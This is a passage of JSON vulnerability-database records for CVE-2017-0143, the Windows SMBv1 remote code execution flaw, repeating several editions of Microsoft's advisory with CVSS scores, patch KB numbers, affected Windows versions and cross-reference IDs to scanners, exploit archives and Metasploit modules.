"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-01T09:06:55", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012216", "KB4013198", "KB4012213", "KB4012217", "KB3177186", "KB4013429", "KB3210720", "KB3213986", "KB4012215", "KB3212646", "KB4012214", "KB3205409", "KB3205401", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:55", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-01T12:45:41", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-10-01T12:45:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-01T12:45:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3205401", "KB4012214", "KB3177186", "KB3212646", "KBMS16-110, 3187754", "KB3210721", "KB4012217", "KB4012212", "KB3210720", "KB3213986", "KB4012598", "KB4012215", "KB4013198", "KB3205409", "KB4012216", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:41", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f324e1b1a767a69b593af7c244e24715", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-04T22:46:36", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 